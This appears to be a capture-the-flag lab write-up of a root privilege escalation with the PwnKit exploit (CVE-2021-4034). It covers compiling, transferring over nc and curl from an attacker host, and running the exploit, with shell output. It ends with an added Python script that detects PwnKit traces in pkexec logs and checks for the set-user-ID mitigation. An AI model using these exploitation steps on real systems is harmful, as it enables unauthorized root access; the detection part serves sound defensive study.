CVE-2021-4034


PEAS found that the target system is vulnerable to CVE-2021-4034, a vulnerability classified as critical that has been found in polkit (unknown version). This issue affects some unknown processing of the file /usr/bin/pkexec. Manipulation with an unknown input leads to an access control vulnerability. Using CWE to declare the problem leads to CWE-284: the software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Confidentiality, integrity, and availability are impacted.

Exploit (PwnKit)


An exploit is available online.

bash-4.2$ gcc
bash: gcc: command not found

The target system has no compiler installed, so the exploit has to be compiled elsewhere and transferred over.

I would normally use a Docker container for that, but I got my personal CentOS 7 testing environment ready.

Remote Compilation


[cent@localhost Desktop]$ git clone https://github.com/berdav/CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Unpacking objects: 100% (92/92), done.

I got the exploit

[cent@localhost CVE-2021-4034]$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.

Compilation done

[cent@localhost CVE-2021-4034]$ cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

I then archived the exploit package for delivery

[cent@localhost Desktop]$ nc 10.1.1.2 2222 < CVE-2021-4034.tar.gz 
 
┌──(kali㉿kali)-[~/…/htb/labs/networked/kernelbuster]
└─$ nnc 2222 > CVE-2021-4034.tar.gz 
listening on [any] 2222 ...
connect to [10.1.1.2] from (UNKNOWN) [10.1.1.30] 46928
 
bash-4.2$ curl -s http://10.10.14.11:8000/CVE-2021-4034.tar.gz -o ./CVE-2021-4034.tar.gz

Delivery complete

Exploitation


bash-4.2$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
bash-4.2$ ./cve-2021-4034
sh-4.2# whoami
root
sh-4.2# hostname
networked.htb
sh-4.2# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:99:2f brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:992f/64 scope global mngtmpaddr dynamic 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:992f/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise
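As an added example that is not part of the original writeup or of the exploit repository, the script below takes the defender's side of the same CVE. It parses the pkexec syslog message that this style of exploitation typically leaves behind (pkexec logs the rejected SHELL variable, and the abused argc == 0 start leaves the COMMAND field empty), and it checks whether the stop-gap mitigation of clearing pkexec's set-user-ID bit has been applied. The sample log lines, hostname, paths and PIDs are constructed, and `scan_log`, `pkexec_hardened` and the other function names are this example's own.

```python
"""Detection and mitigation checks for CVE-2021-4034 (PwnKit) on a Linux host.

Added example; not code from the original writeup or the exploit repository.
"""
import os
import re
import stat

# Messages pkexec writes to the auth log (wording, typos included, as in
# pkexec.c) when its environment sanitisation rejects a variable. A PwnKit
# style run starts pkexec with an empty argv and a bogus SHELL, so the SHELL
# message with an empty COMMAND is the indicator public guidance points to.
# Caveat: the vulnerability can also be exploited without leaving this line,
# so a clean log is not proof that a host was never exploited.
PKEXEC_INDICATORS = (
    "The value for the SHELL variable was not found the /etc/shells file",
    "contains suscipious content",
)

# Classic syslog layout:
#   "Mon DD HH:MM:SS host pkexec[pid]: message [USER=..] [TTY=..] [CWD=..] [COMMAND=..]"
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) pkexec\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
FIELD_RE = re.compile(r"\[(USER|TTY|CWD|COMMAND)=([^\]]*)\]")


def parse_pkexec_line(line):
    """Return a dict for a pkexec syslog line, or None for any other line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    for key, val in FIELD_RE.findall(rec["msg"]):
        rec[key.lower()] = val
    return rec


def is_pwnkit_indicator(rec):
    """True when a parsed pkexec record matches a known exploitation indicator."""
    if rec is None:
        return False
    if not any(ind in rec["msg"] for ind in PKEXEC_INDICATORS):
        return False
    # A legitimate pkexec invocation carries the program it was asked to run;
    # the argc == 0 abuse leaves COMMAND empty.
    return rec.get("command", "") == ""


def scan_log(lines):
    """Return (pid, cwd, user) for every suspicious pkexec event in the lines."""
    hits = []
    for line in lines:
        rec = parse_pkexec_line(line)
        if is_pwnkit_indicator(rec):
            hits.append((rec["pid"], rec.get("cwd", ""), rec.get("user", "")))
    return hits


def suid_bit_set(mode):
    """True if an st_mode value carries the set-user-ID bit, the escalation vector here."""
    return bool(mode & stat.S_ISUID)


def pkexec_hardened(path="/usr/bin/pkexec"):
    """Return (exists, suid). A set-user-ID pkexec on an unpatched host should be
    chmod 0755 as a stop-gap until the fixed polkit package is installed."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return (False, False)
    return (True, suid_bit_set(st.st_mode))


# Constructed sample lines, not taken from a real host.
SAMPLE_LOG = [
    "Jan 26 13:37:42 networked pkexec[4242]: The value for the SHELL variable was not found "
    "the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp/CVE-2021-4034] [COMMAND=]",
    "Jan 26 13:40:01 networked pkexec[4300]: user: Executing command [USER=root] [TTY=unknown] "
    "[CWD=/home/user] [COMMAND=/usr/bin/systemctl restart httpd]",
    "Jan 26 13:41:11 networked sshd[4311]: Accepted publickey for user from 10.1.1.30 port 51222 ssh2",
]

if __name__ == "__main__":
    for pid, cwd, user in scan_log(SAMPLE_LOG):
        print(f"possible PwnKit run: pid={pid} cwd={cwd} user={user}")
    exists, suid = pkexec_hardened()
    if exists and suid:
        print("/usr/bin/pkexec is still set-user-ID; patch polkit or chmod 0755 it")
```

Run it against the host's auth log (`/var/log/secure` on CentOS 7) instead of `SAMPLE_LOG` to hunt for past attempts; the `pkexec_hardened` check complements, but does not replace, confirming that the polkit package on the box actually carries the fix.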